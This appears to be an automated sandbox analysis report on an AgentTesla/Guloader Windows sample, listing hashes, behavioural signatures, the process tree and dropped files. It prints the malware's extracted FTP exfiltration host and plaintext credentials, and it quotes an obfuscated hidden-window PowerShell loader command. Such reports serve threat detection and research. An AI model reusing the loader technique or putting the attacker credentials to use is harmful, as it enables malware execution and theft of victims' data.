Overview

overview

10

Static

static

1

ea973e9c6f...05.exe

windows7-x64

10

ea973e9c6f...05.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    136s
  • max time network
    146s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231127-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231127-enlocale:en-usos:windows10-2004-x64system
  • submitted
    08-12-2023 02:19

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    ea973e9c6f622a479e04107580a0ede92211fbd94b582d843e166fdc2d85dd05.exe

  • Size

    682KB

  • MD5

    55f2d796aae312c3ef0589c215749470

  • SHA1

    151d39760a5318f483ccdcc9829fad5ac8afab52

  • SHA256

    ea973e9c6f622a479e04107580a0ede92211fbd94b582d843e166fdc2d85dd05

  • SHA512

    e2e2d4699056203dcd2af6150e18727c6e54d3405504c5b5964a1f2f1f53c139d143d138395beede01886ab1a45e00fb72a65ae4e9238bf158289270767c3df8

  • SSDEEP

    12288:GwFGHEnT8VJWMB5VmjFvK4Nk35wxcCMjHaylgimtdYM3O0V7bb:G5HEgVJj8jg4k5jCMjhlgZtub0V7

Score
10/10
agentteslaguloaderdownloaderkeyloggerspywarestealertrojan

Malware Config

Extracted

Family

agenttesla

Credentials

  • Protocol:     ftp
  • Host:
    ftp://ftp.vvspijkenisse.nl
  • Port:
    21
  • Username:
    [email protected]
  • Password:
    playingboyz231

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

    keyloggertrojanstealerspywareagenttesla
  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

    downloaderguloader
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ea973e9c6f622a479e04107580a0ede92211fbd94b582d843e166fdc2d85dd05.exe
    "C:\Users\Admin\AppData\Local\Temp\ea973e9c6f622a479e04107580a0ede92211fbd94b582d843e166fdc2d85dd05.exe"
    1⤵
    • Drops file in System32 directory
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Suspicious use of WriteProcessMemory
    PID:3964
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -windowstyle hidden "$Induktion=Get-Content 'C:\Users\Admin\AppData\Roaming\gregerss\dagbger\Sideordnes\Mellilita.Flu';$Evaporeringen139=$Induktion.SubString(50194,3);.$Evaporeringen139($Induktion)"
      2⤵
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4036
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
        3⤵
        • Suspicious use of NtCreateThreadExHideFromDebugger
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3540
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 3540 -s 1868
          4⤵
          • Program crash
          PID:3928
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 3540 -ip 3540
    1⤵
      PID:1880

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3x0cedur.qgo.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • C:\Users\Admin\AppData\Roaming\gregerss\dagbger\Sideordnes\Kvababbelsers.Bum
      Filesize

      272KB

      MD5

      07680313c03d4287ff1b4976923d41f5

      SHA1

      01b440609e243762c5f8fefb97a73625e5ba2d4d

      SHA256

      a0a14bede619d41b689f53f9fad93517f0524167d23c246488d825cb18596c2f

      SHA512

      2bc17abbeee9d106e08302ba542e5e51b30664f5419c12b0d6551355fd72f26bf063771e7f9d9f92eda2349db026ee0362fcfba7f61e5a5ce985e06d429b9569

      Download Submit

    • C:\Users\Admin\AppData\Roaming\gregerss\dagbger\Sideordnes\Mellilita.Flu
      Filesize

      49KB

      MD5

      4f519227d8762ab4a41ce7b824a05c7d

      SHA1

      5bec609db12c8880186abafc97eb21cad74e8366

      SHA256

      6e1b981cbce77169cfb154d3ad563a41bc9d7afa552798380bfc1133d72a0e88

      SHA512

      7a497b096b08521566628c56c98712ab204e40db73a255b9aee993bbf23dd799894d3929b8c0decb76c7ee679d9c4698ad6ffffe77ff6715bd586f1582a93bdd

      Download Submit

    • memory/3540-201-0x0000000077A58000-0x0000000077A59000-memory.dmp

      Filesize

      4KB

      Download

    • memory/3540-203-0x000000006EB70000-0x000000006FDC4000-memory.dmp

      Filesize

      18.3MB

      Download

    • memory/3540-213-0x0000000073D70000-0x0000000074520000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/3540-210-0x000000001FEE0000-0x000000001FEF0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/3540-209-0x0000000073D70000-0x0000000074520000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/3540-207-0x000000006EB70000-0x000000006EBB0000-memory.dmp

      Filesize

      256KB

      Download

    • memory/3540-204-0x0000000000D00000-0x0000000001EF2000-memory.dmp

      Filesize

      17.9MB

      Download

    • memory/3540-202-0x00000000779D1000-0x0000000077AF1000-memory.dmp

      Filesize

      1.1MB

      Download

    • memory/3540-199-0x0000000000D00000-0x0000000001EF2000-memory.dmp

      Filesize

      17.9MB

      Download

    • memory/3540-211-0x0000000000D00000-0x0000000001EF2000-memory.dmp

      Filesize

      17.9MB

      Download

    • memory/4036-192-0x0000000073D70000-0x0000000074520000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/4036-194-0x00000000090F0000-0x000000000A2E2000-memory.dmp

      Filesize

      17.9MB

      Download

    • memory/4036-183-0x00000000077F0000-0x0000000007886000-memory.dmp

      Filesize

      600KB

      Download

    • memory/4036-186-0x0000000007E40000-0x00000000083E4000-memory.dmp

      Filesize

      5.6MB

      Download

    • memory/4036-164-0x00000000031F0000-0x0000000003226000-memory.dmp

      Filesize

      216KB

      Download

    • memory/4036-188-0x0000000008A70000-0x00000000090EA000-memory.dmp

      Filesize

      6.5MB

      Download

    • memory/4036-163-0x00000000032D0000-0x00000000032E0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/4036-191-0x0000000007D70000-0x0000000007D74000-memory.dmp

      Filesize

      16KB

      Download

    • memory/4036-168-0x0000000006160000-0x00000000061C6000-memory.dmp

      Filesize

      408KB

      Download

    • memory/4036-182-0x00000000032D0000-0x00000000032E0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/4036-196-0x00000000032D0000-0x00000000032E0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/4036-167-0x0000000005830000-0x0000000005852000-memory.dmp

      Filesize

      136KB

      Download

    • memory/4036-185-0x0000000006D60000-0x0000000006D82000-memory.dmp

      Filesize

      136KB

      Download

    • memory/4036-184-0x0000000006D10000-0x0000000006D2A000-memory.dmp

      Filesize

      104KB

      Download

    • memory/4036-165-0x00000000032D0000-0x00000000032E0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/4036-200-0x00000000090F0000-0x000000000A2E2000-memory.dmp

      Filesize

      17.9MB

      Download

    • memory/4036-162-0x0000000073D70000-0x0000000074520000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/4036-198-0x00000000779D1000-0x0000000077AF1000-memory.dmp

      Filesize

      1.1MB

      Download

    • memory/4036-166-0x00000000059C0000-0x0000000005FE8000-memory.dmp

      Filesize

      6.2MB

      Download

    • memory/4036-175-0x0000000006240000-0x0000000006594000-memory.dmp

      Filesize

      3.3MB

      Download

    • memory/4036-205-0x0000000073D70000-0x0000000074520000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/4036-181-0x00000000068F0000-0x000000000693C000-memory.dmp

      Filesize

      304KB

      Download

    • memory/4036-208-0x00000000090F0000-0x000000000A2E2000-memory.dmp

      Filesize

      17.9MB

      Download

    • memory/4036-169-0x00000000061D0000-0x0000000006236000-memory.dmp

      Filesize

      408KB

      Download

    • memory/4036-197-0x00000000032D0000-0x00000000032E0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/4036-193-0x00000000090F0000-0x000000000A2E2000-memory.dmp

      Filesize

      17.9MB

      Download

    • memory/4036-180-0x0000000006800000-0x000000000681E000-memory.dmp

      Filesize

      120KB

      Download